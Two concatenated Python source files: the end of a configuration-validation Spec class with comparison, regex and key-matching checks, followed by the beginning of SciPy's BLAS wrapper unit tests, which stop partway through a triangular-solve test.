``gt``, ``eq``. This argument will restrict the number or string to
emit True on the given comparison.
:param cint:
Number or string with which value is compared. Type of this
parameter affects required type of the checked value: ``str`` and
``unicode`` types imply ``unicode`` values, ``float`` type implies
that value can be either ``int`` or ``float``, ``int`` type implies
``int`` value and for any other type the behavior is undefined.
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value. Default value will emit
something like “10 is not greater then 10”.
:return: self.
'''
if type(cint) is str:
self.type(unicode)
elif type(cint) is float:
self.type(int, float)
else:
self.type(type(cint))
cmp_func = self.cmp_funcs[comparison]
msg_func = msg_func or (lambda value: '{0} is not {1} {2}'.format(value, self.cmp_msgs[comparison], cint))
self.checks.append((
'check_func',
(lambda value, *args: (True, True, not cmp_func(value.value, cint))),
msg_func
))
return self
def unsigned(self, msg_func=None):
'''Describe unsigned integer value
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value.
:return: self.
'''
self.type(int)
self.checks.append((
'check_func',
(lambda value, *args: (True, True, value < 0)),
(lambda value: '{0} must be greater then zero'.format(value))
))
return self
def list(self, item_func, msg_func=None):
'''Describe list with any number of elements, each matching given spec
:param item_func:
:py:class:`Spec` instance or a callable. Check out
:py:meth:`Spec.check_list` documentation for more details. Note that
in :py:meth:`Spec.check_list` description :py:class:`Spec` instance
is replaced with its index in ``self.specs``.
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value. Default value will emit just
“failed check”, which is rather indescriptive.
:return: self.
'''
self.type(list)
if isinstance(item_func, Spec):
self.specs.append(item_func)
item_func = len(self.specs) - 1
self.checks.append(('check_list', item_func, msg_func or (lambda item: 'failed check')))
return self
def tuple(self, *specs):
'''Describe list with the given number of elements, each matching corresponding spec
:param (Spec,) specs:
List of specifications. Last element(s) in this list may be
optional. Each element in this list describes element with the same
index in the checked value. Check out :py:meth:`Spec.check_tuple`
for more details, but note that there list of specifications is
replaced with start and end indicies in ``self.specs``.
:return: self.
'''
self.type(list)
max_len = len(specs)
min_len = max_len
for spec in reversed(specs):
if spec.isoptional:
min_len -= 1
else:
break
if max_len == min_len:
self.len('eq', len(specs))
else:
self.len('ge', min_len)
self.len('le', max_len)
start = len(self.specs)
for i, spec in zip(itertools.count(), specs):
self.specs.append(spec)
self.checks.append(('check_tuple', start, len(self.specs)))
return self
def func(self, func, msg_func=None):
'''Describe value that is checked by the given function
Check out :py:meth:`Spec.check_func` documentation for more details.
'''
self.checks.append(('check_func', func, msg_func or (lambda value: 'failed check')))
return self
def re(self, regex, msg_func=None):
'''Describe value that is a string that matches given regular expression
:param str regex:
Regular expression that should be matched by the value.
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value. Default value will emit
something like “String "xyz" does not match "[a-f]+"”.
:return: self.
'''
self.type(unicode)
compiled = re.compile(regex)
msg_func = msg_func or (lambda value: 'String "{0}" does not match "{1}"'.format(value, regex))
self.checks.append((
'check_func',
(lambda value, *args: (True, True, not compiled.match(value.value))),
msg_func
))
return self
def ident(self, msg_func=None):
'''Describe value that is an identifier like ``foo:bar`` or ``foo``
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value. Default value will emit
something like “String "xyz" is not an … identifier”.
:return: self.
'''
msg_func = (
msg_func
or (lambda value: 'String "{0}" is not an alphanumeric/underscore colon-separated identifier'.format(value))
)
return self.re('^\w+(?::\w+)?$', msg_func)
def oneof(self, collection, msg_func=None):
'''Describe value that is equal to one of the value in the collection
:param set collection:
A collection of possible values.
:param function msg_func:
Function that should accept checked value and return message that
describes the problem with this value. Default value will emit
something like “"xyz" must be one of {'abc', 'def', 'ghi'}”.
:return: self.
'''
msg_func = msg_func or (lambda value: '"{0}" must be one of {1!r}'.format(value, list(collection)))
self.checks.append((
'check_func',
(lambda value, *args: (True, True, value not in collection)),
msg_func
))
return self
def error(self, msg):
'''Describe value that must not be there
Useful for giving more descriptive errors for some specific keys then
just “found unknown key: shutdown_event” or for forbidding certain
values when :py:meth:`Spec.unknown_spec` was used.
:param str msg:
Message given for the offending value. It is formatted using
:py:meth:`str.format` with the only positional parameter which is
the value itself.
:return: self.
'''
self.checks.append((
'check_func',
(lambda *args: (True, True, True)),
(lambda value: msg.format(value))
))
return self
def either(self, *specs):
'''Describes value that matches one of the given specs
Check out :py:meth:`Spec.check_either` method documentation for more
details, but note that there a list of specs was replaced by start and
end indicies in ``self.specs``.
:return: self.
'''
start = len(self.specs)
self.specs.extend(specs)
self.checks.append(('check_either', start, len(self.specs)))
return self
def optional(self):
'''Mark value as optional
Only useful for key specs in :py:meth:`Spec.__init__` and
:py:meth:`Spec.update` and some last supplied to :py:meth:`Spec.tuple`.
:return: self.
'''
self.isoptional = True
return self
def required(self):
'''Mark value as required
Only useful for key specs in :py:meth:`Spec.__init__` and
:py:meth:`Spec.update` and some last supplied to :py:meth:`Spec.tuple`.
.. note::
Value is required by default. This method is only useful for
altering existing specification (or rather its copy).
:return: self.
'''
self.isoptional = False
return self
def match_checks(self, *args):
'''Process checks registered for the given value
Processes only “top-level” checks: key specifications given using at the
initialization or via :py:meth:`Spec.unknown_spec` are processed by
:py:meth:`Spec.match`.
:return: proceed, hadproblem.
'''
hadproblem = False
for check in self.checks:
proceed, chadproblem = getattr(self, check[0])(*(args + check[1:]))
if chadproblem:
hadproblem = True
if not proceed:
return False, hadproblem
return True, hadproblem
def match(self, value, context_mark=None, data=None, context=(), echoerr=echoerr):
'''Check that given value matches this specification
:return: proceed, hadproblem.
'''
havemarks(value)
proceed, hadproblem = self.match_checks(value, context_mark, data, context, echoerr)
if proceed:
if self.keys or self.uspecs:
for key, vali in self.keys.items():
valspec = self.specs[vali]
if key in value:
proceed, mhadproblem = valspec.match(
value[key],
value.mark,
data,
context.enter_key(value, key),
echoerr
)
if mhadproblem:
hadproblem = True
if not proceed:
return False, hadproblem
else:
if not valspec.isoptional:
hadproblem = True
echoerr(context=self.cmsg.format(key=context.key),
context_mark=None,
problem='required key is missing: {0}'.format(key),
problem_mark=value.mark)
for key in value.keys():
havemarks(key)
if key not in self.keys:
for keyfunc, vali in self.uspecs:
valspec = self.specs[vali]
if isinstance(keyfunc, int):
spec = self.specs[keyfunc]
proceed, khadproblem = spec.match(key, context_mark, data, context, echoerr)
else:
proceed, khadproblem = keyfunc(key, data, context, echoerr)
if khadproblem:
hadproblem = True
if proceed:
proceed, vhadproblem = valspec.match(
value[key],
value.mark,
data,
context.enter_key(value, key),
echoerr
)
if vhadproblem:
hadproblem = True
break
else:
hadproblem = True
if self.ufailmsg:
echoerr(context=self.cmsg.format(key=context.key),
context_mark=None,
problem=self.ufailmsg(key),
problem_mark=key.mark)
return True, hadproblem
def __getitem__(self, key):
'''Get specification for the given key
'''
return self.specs[self.keys[key]]
def __setitem__(self, key, value):
'''Set specification for the given key
'''
self.update(**{key: value})
|
gertingold/scipy
|
refs/heads/master
|
scipy/linalg/tests/test_blas.py
|
23
|
#
# Created by: Pearu Peterson, April 2002
#
from __future__ import division, print_function, absolute_import
__usage__ = """
Build linalg:
python setup.py build
Run tests if scipy is installed:
python -c 'import scipy;scipy.linalg.test()'
"""
import math
import numpy as np
from numpy.testing import (assert_equal, assert_almost_equal, assert_,
assert_array_almost_equal, assert_allclose)
from pytest import raises as assert_raises
from numpy import float32, float64, complex64, complex128, arange, triu, \
tril, zeros, tril_indices, ones, mod, diag, append, eye, \
nonzero
from numpy.random import rand, seed
from scipy.linalg import _fblas as fblas, get_blas_funcs, toeplitz, solve, \
solve_triangular
try:
from scipy.linalg import _cblas as cblas
except ImportError:
cblas = None
REAL_DTYPES = [float32, float64]
COMPLEX_DTYPES = [complex64, complex128]
DTYPES = REAL_DTYPES + COMPLEX_DTYPES
def test_get_blas_funcs():
# check that it returns Fortran code for arrays that are
# fortran-ordered
f1, f2, f3 = get_blas_funcs(
('axpy', 'axpy', 'axpy'),
(np.empty((2, 2), dtype=np.complex64, order='F'),
np.empty((2, 2), dtype=np.complex128, order='C'))
)
# get_blas_funcs will choose libraries depending on most generic
# array
assert_equal(f1.typecode, 'z')
assert_equal(f2.typecode, 'z')
if cblas is not None:
assert_equal(f1.module_name, 'cblas')
assert_equal(f2.module_name, 'cblas')
# check defaults.
f1 = get_blas_funcs('rotg')
assert_equal(f1.typecode, 'd')
# check also dtype interface
f1 = get_blas_funcs('gemm', dtype=np.complex64)
assert_equal(f1.typecode, 'c')
f1 = get_blas_funcs('gemm', dtype='F')
assert_equal(f1.typecode, 'c')
# extended precision complex
f1 = get_blas_funcs('gemm', dtype=np.longcomplex)
assert_equal(f1.typecode, 'z')
# check safe complex upcasting
f1 = get_blas_funcs('axpy',
(np.empty((2, 2), dtype=np.float64),
np.empty((2, 2), dtype=np.complex64))
)
assert_equal(f1.typecode, 'z')
def test_get_blas_funcs_alias():
# check alias for get_blas_funcs
f, g = get_blas_funcs(('nrm2', 'dot'), dtype=np.complex64)
assert f.typecode == 'c'
assert g.typecode == 'c'
f, g, h = get_blas_funcs(('dot', 'dotc', 'dotu'), dtype=np.float64)
assert f is g
assert f is h
class TestCBLAS1Simple(object):
def test_axpy(self):
for p in 'sd':
f = getattr(cblas, p+'axpy', None)
if f is None:
continue
assert_array_almost_equal(f([1, 2, 3], [2, -1, 3], a=5),
[7, 9, 18])
for p in 'cz':
f = getattr(cblas, p+'axpy', None)
if f is None:
continue
assert_array_almost_equal(f([1, 2j, 3], [2, -1, 3], a=5),
[7, 10j-1, 18])
class TestFBLAS1Simple(object):
def test_axpy(self):
for p in 'sd':
f = getattr(fblas, p+'axpy', None)
if f is None:
continue
assert_array_almost_equal(f([1, 2, 3], [2, -1, 3], a=5),
[7, 9, 18])
for p in 'cz':
f = getattr(fblas, p+'axpy', None)
if f is None:
continue
assert_array_almost_equal(f([1, 2j, 3], [2, -1, 3], a=5),
[7, 10j-1, 18])
def test_copy(self):
for p in 'sd':
f = getattr(fblas, p+'copy', None)
if f is None:
continue
assert_array_almost_equal(f([3, 4, 5], [8]*3), [3, 4, 5])
for p in 'cz':
f = getattr(fblas, p+'copy', None)
if f is None:
continue
assert_array_almost_equal(f([3, 4j, 5+3j], [8]*3), [3, 4j, 5+3j])
def test_asum(self):
for p in 'sd':
f = getattr(fblas, p+'asum', None)
if f is None:
continue
assert_almost_equal(f([3, -4, 5]), 12)
for p in ['sc', 'dz']:
f = getattr(fblas, p+'asum', None)
if f is None:
continue
assert_almost_equal(f([3j, -4, 3-4j]), 14)
def test_dot(self):
for p in 'sd':
f = getattr(fblas, p+'dot', None)
if f is None:
continue
assert_almost_equal(f([3, -4, 5], [2, 5, 1]), -9)
def test_complex_dotu(self):
for p in 'cz':
f = getattr(fblas, p+'dotu', None)
if f is None:
continue
assert_almost_equal(f([3j, -4, 3-4j], [2, 3, 1]), -9+2j)
def test_complex_dotc(self):
for p in 'cz':
f = getattr(fblas, p+'dotc', None)
if f is None:
continue
assert_almost_equal(f([3j, -4, 3-4j], [2, 3j, 1]), 3-14j)
def test_nrm2(self):
for p in 'sd':
f = getattr(fblas, p+'nrm2', None)
if f is None:
continue
assert_almost_equal(f([3, -4, 5]), math.sqrt(50))
for p in ['c', 'z', 'sc', 'dz']:
f = getattr(fblas, p+'nrm2', None)
if f is None:
continue
assert_almost_equal(f([3j, -4, 3-4j]), math.sqrt(50))
def test_scal(self):
for p in 'sd':
f = getattr(fblas, p+'scal', None)
if f is None:
continue
assert_array_almost_equal(f(2, [3, -4, 5]), [6, -8, 10])
for p in 'cz':
f = getattr(fblas, p+'scal', None)
if f is None:
continue
assert_array_almost_equal(f(3j, [3j, -4, 3-4j]), [-9, -12j, 12+9j])
for p in ['cs', 'zd']:
f = getattr(fblas, p+'scal', None)
if f is None:
continue
assert_array_almost_equal(f(3, [3j, -4, 3-4j]), [9j, -12, 9-12j])
def test_swap(self):
for p in 'sd':
f = getattr(fblas, p+'swap', None)
if f is None:
continue
x, y = [2, 3, 1], [-2, 3, 7]
x1, y1 = f(x, y)
assert_array_almost_equal(x1, y)
assert_array_almost_equal(y1, x)
for p in 'cz':
f = getattr(fblas, p+'swap', None)
if f is None:
continue
x, y = [2, 3j, 1], [-2, 3, 7-3j]
x1, y1 = f(x, y)
assert_array_almost_equal(x1, y)
assert_array_almost_equal(y1, x)
def test_amax(self):
for p in 'sd':
f = getattr(fblas, 'i'+p+'amax')
assert_equal(f([-2, 4, 3]), 1)
for p in 'cz':
f = getattr(fblas, 'i'+p+'amax')
assert_equal(f([-5, 4+3j, 6]), 1)
# XXX: need tests for rot,rotm,rotg,rotmg
class TestFBLAS2Simple(object):
def test_gemv(self):
for p in 'sd':
f = getattr(fblas, p+'gemv', None)
if f is None:
continue
assert_array_almost_equal(f(3, [[3]], [-4]), [-36])
assert_array_almost_equal(f(3, [[3]], [-4], 3, [5]), [-21])
for p in 'cz':
f = getattr(fblas, p+'gemv', None)
if f is None:
continue
assert_array_almost_equal(f(3j, [[3-4j]], [-4]), [-48-36j])
assert_array_almost_equal(f(3j, [[3-4j]], [-4], 3, [5j]),
[-48-21j])
def test_ger(self):
for p in 'sd':
f = getattr(fblas, p+'ger', None)
if f is None:
continue
assert_array_almost_equal(f(1, [1, 2], [3, 4]), [[3, 4], [6, 8]])
assert_array_almost_equal(f(2, [1, 2, 3], [3, 4]),
[[6, 8], [12, 16], [18, 24]])
assert_array_almost_equal(f(1, [1, 2], [3, 4],
a=[[1, 2], [3, 4]]), [[4, 6], [9, 12]])
for p in 'cz':
f = getattr(fblas, p+'geru', None)
if f is None:
continue
assert_array_almost_equal(f(1, [1j, 2], [3, 4]),
[[3j, 4j], [6, 8]])
assert_array_almost_equal(f(-2, [1j, 2j, 3j], [3j, 4j]),
[[6, 8], [12, 16], [18, 24]])
for p in 'cz':
for name in ('ger', 'gerc'):
f = getattr(fblas, p+name, None)
if f is None:
continue
assert_array_almost_equal(f(1, [1j, 2], [3, 4]),
[[3j, 4j], [6, 8]])
assert_array_almost_equal(f(2, [1j, 2j, 3j], [3j, 4j]),
[[6, 8], [12, 16], [18, 24]])
def test_syr_her(self):
x = np.arange(1, 5, dtype='d')
resx = np.triu(x[:, np.newaxis] * x)
resx_reverse = np.triu(x[::-1, np.newaxis] * x[::-1])
y = np.linspace(0, 8.5, 17, endpoint=False)
z = np.arange(1, 9, dtype='d').view('D')
resz = np.triu(z[:, np.newaxis] * z)
resz_reverse = np.triu(z[::-1, np.newaxis] * z[::-1])
rehz = np.triu(z[:, np.newaxis] * z.conj())
rehz_reverse = np.triu(z[::-1, np.newaxis] * z[::-1].conj())
w = np.c_[np.zeros(4), z, np.zeros(4)].ravel()
for p, rtol in zip('sd', [1e-7, 1e-14]):
f = getattr(fblas, p+'syr', None)
if f is None:
continue
assert_allclose(f(1.0, x), resx, rtol=rtol)
assert_allclose(f(1.0, x, lower=True), resx.T, rtol=rtol)
assert_allclose(f(1.0, y, incx=2, offx=2, n=4), resx, rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, y, incx=-2, offx=2, n=4),
resx_reverse, rtol=rtol)
a = np.zeros((4, 4), 'f' if p == 's' else 'd', 'F')
b = f(1.0, x, a=a, overwrite_a=True)
assert_allclose(a, resx, rtol=rtol)
b = f(2.0, x, a=a)
assert_(a is not b)
assert_allclose(b, 3*resx, rtol=rtol)
assert_raises(Exception, f, 1.0, x, incx=0)
assert_raises(Exception, f, 1.0, x, offx=5)
assert_raises(Exception, f, 1.0, x, offx=-2)
assert_raises(Exception, f, 1.0, x, n=-2)
assert_raises(Exception, f, 1.0, x, n=5)
assert_raises(Exception, f, 1.0, x, lower=2)
assert_raises(Exception, f, 1.0, x, a=np.zeros((2, 2), 'd', 'F'))
for p, rtol in zip('cz', [1e-7, 1e-14]):
f = getattr(fblas, p+'syr', None)
if f is None:
continue
assert_allclose(f(1.0, z), resz, rtol=rtol)
assert_allclose(f(1.0, z, lower=True), resz.T, rtol=rtol)
assert_allclose(f(1.0, w, incx=3, offx=1, n=4), resz, rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, w, incx=-3, offx=1, n=4),
resz_reverse, rtol=rtol)
a = np.zeros((4, 4), 'F' if p == 'c' else 'D', 'F')
b = f(1.0, z, a=a, overwrite_a=True)
assert_allclose(a, resz, rtol=rtol)
b = f(2.0, z, a=a)
assert_(a is not b)
assert_allclose(b, 3*resz, rtol=rtol)
assert_raises(Exception, f, 1.0, x, incx=0)
assert_raises(Exception, f, 1.0, x, offx=5)
assert_raises(Exception, f, 1.0, x, offx=-2)
assert_raises(Exception, f, 1.0, x, n=-2)
assert_raises(Exception, f, 1.0, x, n=5)
assert_raises(Exception, f, 1.0, x, lower=2)
assert_raises(Exception, f, 1.0, x, a=np.zeros((2, 2), 'd', 'F'))
for p, rtol in zip('cz', [1e-7, 1e-14]):
f = getattr(fblas, p+'her', None)
if f is None:
continue
assert_allclose(f(1.0, z), rehz, rtol=rtol)
assert_allclose(f(1.0, z, lower=True), rehz.T.conj(), rtol=rtol)
assert_allclose(f(1.0, w, incx=3, offx=1, n=4), rehz, rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, w, incx=-3, offx=1, n=4),
rehz_reverse, rtol=rtol)
a = np.zeros((4, 4), 'F' if p == 'c' else 'D', 'F')
b = f(1.0, z, a=a, overwrite_a=True)
assert_allclose(a, rehz, rtol=rtol)
b = f(2.0, z, a=a)
assert_(a is not b)
assert_allclose(b, 3*rehz, rtol=rtol)
assert_raises(Exception, f, 1.0, x, incx=0)
assert_raises(Exception, f, 1.0, x, offx=5)
assert_raises(Exception, f, 1.0, x, offx=-2)
assert_raises(Exception, f, 1.0, x, n=-2)
assert_raises(Exception, f, 1.0, x, n=5)
assert_raises(Exception, f, 1.0, x, lower=2)
assert_raises(Exception, f, 1.0, x, a=np.zeros((2, 2), 'd', 'F'))
def test_syr2(self):
x = np.arange(1, 5, dtype='d')
y = np.arange(5, 9, dtype='d')
resxy = np.triu(x[:, np.newaxis] * y + y[:, np.newaxis] * x)
resxy_reverse = np.triu(x[::-1, np.newaxis] * y[::-1]
+ y[::-1, np.newaxis] * x[::-1])
q = np.linspace(0, 8.5, 17, endpoint=False)
for p, rtol in zip('sd', [1e-7, 1e-14]):
f = getattr(fblas, p+'syr2', None)
if f is None:
continue
assert_allclose(f(1.0, x, y), resxy, rtol=rtol)
assert_allclose(f(1.0, x, y, n=3), resxy[:3, :3], rtol=rtol)
assert_allclose(f(1.0, x, y, lower=True), resxy.T, rtol=rtol)
assert_allclose(f(1.0, q, q, incx=2, offx=2, incy=2, offy=10),
resxy, rtol=rtol)
assert_allclose(f(1.0, q, q, incx=2, offx=2, incy=2, offy=10, n=3),
resxy[:3, :3], rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, q, q, incx=-2, offx=2, incy=-2, offy=10),
resxy_reverse, rtol=rtol)
a = np.zeros((4, 4), 'f' if p == 's' else 'd', 'F')
b = f(1.0, x, y, a=a, overwrite_a=True)
assert_allclose(a, resxy, rtol=rtol)
b = f(2.0, x, y, a=a)
assert_(a is not b)
assert_allclose(b, 3*resxy, rtol=rtol)
assert_raises(Exception, f, 1.0, x, y, incx=0)
assert_raises(Exception, f, 1.0, x, y, offx=5)
assert_raises(Exception, f, 1.0, x, y, offx=-2)
assert_raises(Exception, f, 1.0, x, y, incy=0)
assert_raises(Exception, f, 1.0, x, y, offy=5)
assert_raises(Exception, f, 1.0, x, y, offy=-2)
assert_raises(Exception, f, 1.0, x, y, n=-2)
assert_raises(Exception, f, 1.0, x, y, n=5)
assert_raises(Exception, f, 1.0, x, y, lower=2)
assert_raises(Exception, f, 1.0, x, y,
a=np.zeros((2, 2), 'd', 'F'))
def test_her2(self):
x = np.arange(1, 9, dtype='d').view('D')
y = np.arange(9, 17, dtype='d').view('D')
resxy = x[:, np.newaxis] * y.conj() + y[:, np.newaxis] * x.conj()
resxy = np.triu(resxy)
resxy_reverse = x[::-1, np.newaxis] * y[::-1].conj()
resxy_reverse += y[::-1, np.newaxis] * x[::-1].conj()
resxy_reverse = np.triu(resxy_reverse)
u = np.c_[np.zeros(4), x, np.zeros(4)].ravel()
v = np.c_[np.zeros(4), y, np.zeros(4)].ravel()
for p, rtol in zip('cz', [1e-7, 1e-14]):
f = getattr(fblas, p+'her2', None)
if f is None:
continue
assert_allclose(f(1.0, x, y), resxy, rtol=rtol)
assert_allclose(f(1.0, x, y, n=3), resxy[:3, :3], rtol=rtol)
assert_allclose(f(1.0, x, y, lower=True), resxy.T.conj(),
rtol=rtol)
assert_allclose(f(1.0, u, v, incx=3, offx=1, incy=3, offy=1),
resxy, rtol=rtol)
assert_allclose(f(1.0, u, v, incx=3, offx=1, incy=3, offy=1, n=3),
resxy[:3, :3], rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, u, v, incx=-3, offx=1, incy=-3, offy=1),
resxy_reverse, rtol=rtol)
a = np.zeros((4, 4), 'F' if p == 'c' else 'D', 'F')
b = f(1.0, x, y, a=a, overwrite_a=True)
assert_allclose(a, resxy, rtol=rtol)
b = f(2.0, x, y, a=a)
assert_(a is not b)
assert_allclose(b, 3*resxy, rtol=rtol)
assert_raises(Exception, f, 1.0, x, y, incx=0)
assert_raises(Exception, f, 1.0, x, y, offx=5)
assert_raises(Exception, f, 1.0, x, y, offx=-2)
assert_raises(Exception, f, 1.0, x, y, incy=0)
assert_raises(Exception, f, 1.0, x, y, offy=5)
assert_raises(Exception, f, 1.0, x, y, offy=-2)
assert_raises(Exception, f, 1.0, x, y, n=-2)
assert_raises(Exception, f, 1.0, x, y, n=5)
assert_raises(Exception, f, 1.0, x, y, lower=2)
assert_raises(Exception, f, 1.0, x, y,
a=np.zeros((2, 2), 'd', 'F'))
def test_gbmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 7
m = 5
kl = 1
ku = 2
# fake a banded matrix via toeplitz
A = toeplitz(append(rand(kl+1), zeros(m-kl-1)),
append(rand(ku+1), zeros(n-ku-1)))
A = A.astype(dtype)
Ab = zeros((kl+ku+1, n), dtype=dtype)
# Form the banded storage
Ab[2, :5] = A[0, 0] # diag
Ab[1, 1:6] = A[0, 1] # sup1
Ab[0, 2:7] = A[0, 2] # sup2
Ab[3, :4] = A[1, 0] # sub1
x = rand(n).astype(dtype)
y = rand(m).astype(dtype)
alpha, beta = dtype(3), dtype(-5)
func, = get_blas_funcs(('gbmv',), dtype=dtype)
y1 = func(m=m, n=n, ku=ku, kl=kl, alpha=alpha, a=Ab,
x=x, y=y, beta=beta)
y2 = alpha * A.dot(x) + beta * y
assert_array_almost_equal(y1, y2)
def test_sbmv_hbmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 6
k = 2
A = zeros((n, n), dtype=dtype)
Ab = zeros((k+1, n), dtype=dtype)
# Form the array and its packed banded storage
A[arange(n), arange(n)] = rand(n)
for ind2 in range(1, k+1):
temp = rand(n-ind2)
A[arange(n-ind2), arange(ind2, n)] = temp
Ab[-1-ind2, ind2:] = temp
A = A.astype(dtype)
A = A + A.T if ind < 2 else A + A.conj().T
Ab[-1, :] = diag(A)
x = rand(n).astype(dtype)
y = rand(n).astype(dtype)
alpha, beta = dtype(1.25), dtype(3)
if ind > 1:
func, = get_blas_funcs(('hbmv',), dtype=dtype)
else:
func, = get_blas_funcs(('sbmv',), dtype=dtype)
y1 = func(k=k, alpha=alpha, a=Ab, x=x, y=y, beta=beta)
y2 = alpha * A.dot(x) + beta * y
assert_array_almost_equal(y1, y2)
def test_spmv_hpmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES+COMPLEX_DTYPES):
n = 3
A = rand(n, n).astype(dtype)
if ind > 1:
A += rand(n, n)*1j
A = A.astype(dtype)
A = A + A.T if ind < 4 else A + A.conj().T
c, r = tril_indices(n)
Ap = A[r, c]
x = rand(n).astype(dtype)
y = rand(n).astype(dtype)
xlong = arange(2*n).astype(dtype)
ylong = ones(2*n).astype(dtype)
alpha, beta = dtype(1.25), dtype(2)
if ind > 3:
func, = get_blas_funcs(('hpmv',), dtype=dtype)
else:
func, = get_blas_funcs(('spmv',), dtype=dtype)
y1 = func(n=n, alpha=alpha, ap=Ap, x=x, y=y, beta=beta)
y2 = alpha * A.dot(x) + beta * y
assert_array_almost_equal(y1, y2)
# Test inc and offsets
y1 = func(n=n-1, alpha=alpha, beta=beta, x=xlong, y=ylong, ap=Ap,
incx=2, incy=2, offx=n, offy=n)
y2 = (alpha * A[:-1, :-1]).dot(xlong[3::2]) + beta * ylong[3::2]
assert_array_almost_equal(y1[3::2], y2)
assert_almost_equal(y1[4], ylong[4])
def test_spr_hpr(self):
seed(1234)
for ind, dtype in enumerate(DTYPES+COMPLEX_DTYPES):
n = 3
A = rand(n, n).astype(dtype)
if ind > 1:
A += rand(n, n)*1j
A = A.astype(dtype)
A = A + A.T if ind < 4 else A + A.conj().T
c, r = tril_indices(n)
Ap = A[r, c]
x = rand(n).astype(dtype)
alpha = (DTYPES+COMPLEX_DTYPES)[mod(ind, 4)](2.5)
if ind > 3:
func, = get_blas_funcs(('hpr',), dtype=dtype)
y2 = alpha * x[:, None].dot(x[None, :].conj()) + A
else:
func, = get_blas_funcs(('spr',), dtype=dtype)
y2 = alpha * x[:, None].dot(x[None, :]) + A
y1 = func(n=n, alpha=alpha, ap=Ap, x=x)
y1f = zeros((3, 3), dtype=dtype)
y1f[r, c] = y1
y1f[c, r] = y1.conj() if ind > 3 else y1
assert_array_almost_equal(y1f, y2)
def test_spr2_hpr2(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 3
A = rand(n, n).astype(dtype)
if ind > 1:
A += rand(n, n)*1j
A = A.astype(dtype)
A = A + A.T if ind < 2 else A + A.conj().T
c, r = tril_indices(n)
Ap = A[r, c]
x = rand(n).astype(dtype)
y = rand(n).astype(dtype)
alpha = dtype(2)
if ind > 1:
func, = get_blas_funcs(('hpr2',), dtype=dtype)
else:
func, = get_blas_funcs(('spr2',), dtype=dtype)
u = alpha.conj() * x[:, None].dot(y[None, :].conj())
y2 = A + u + u.conj().T
y1 = func(n=n, alpha=alpha, x=x, y=y, ap=Ap)
y1f = zeros((3, 3), dtype=dtype)
y1f[r, c] = y1
y1f[[1, 2, 2], [0, 0, 1]] = y1[[1, 3, 4]].conj()
assert_array_almost_equal(y1f, y2)
def test_tbmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 10
k = 3
x = rand(n).astype(dtype)
A = zeros((n, n), dtype=dtype)
# Banded upper triangular array
for sup in range(k+1):
A[arange(n-sup), arange(sup, n)] = rand(n-sup)
# Add complex parts for c,z
if ind > 1:
A[nonzero(A)] += 1j * rand((k+1)*n-(k*(k+1)//2)).astype(dtype)
# Form the banded storage
Ab = zeros((k+1, n), dtype=dtype)
for row in range(k+1):
Ab[-row-1, row:] = diag(A, k=row)
func, = get_blas_funcs(('tbmv',), dtype=dtype)
y1 = func(k=k, a=Ab, x=x)
y2 = A.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = A.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1, trans=1)
y2 = A.T.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1, trans=2)
y2 = A.conj().T.dot(x)
assert_array_almost_equal(y1, y2)
def test_tbsv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 6
k = 3
x = rand(n).astype(dtype)
A = zeros((n, n), dtype=dtype)
# Banded upper triangular array
for sup in range(k+1):
A[arange(n-sup), arange(sup, n)] = rand(n-sup)
# Add complex parts for c,z
if ind > 1:
A[nonzero(A)] += 1j * rand((k+1)*n-(k*(k+1)//2)).astype(dtype)
# Form the banded storage
Ab = zeros((k+1, n), dtype=dtype)
for row in range(k+1):
Ab[-row-1, row:] = diag(A, k=row)
func, = get_blas_funcs(('tbsv',), dtype=dtype)
y1 = func(k=k, a=Ab, x=x)
y2 = solve(A, x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = solve(A, x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1, trans=1)
y2 = solve(A.T, x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1, trans=2)
y2 = solve(A.conj().T, x)
assert_array_almost_equal(y1, y2)
def test_tpmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 10
x = rand(n).astype(dtype)
# Upper triangular array
A = triu(rand(n, n)) if ind < 2 else triu(rand(n, n)+rand(n, n)*1j)
# Form the packed storage
c, r = tril_indices(n)
Ap = A[r, c]
func, = get_blas_funcs(('tpmv',), dtype=dtype)
y1 = func(n=n, ap=Ap, x=x)
y2 = A.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = A.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1, trans=1)
y2 = A.T.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1, trans=2)
y2 = A.conj().T.dot(x)
assert_array_almost_equal(y1, y2)
def test_tpsv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 10
x = rand(n).astype(dtype)
# Upper triangular array
A = triu(rand(n, n)) if ind < 2 else triu(rand(n, n)+rand(n, n)*1j)
A += eye(n)
# Form the packed storage
c, r = tril_indices(n)
Ap = A[r, c]
func, = get_blas_funcs(('tpsv',), dtype=dtype)
y1 = func(n=n, ap=Ap, x=x)
y2 = solve(A, x)
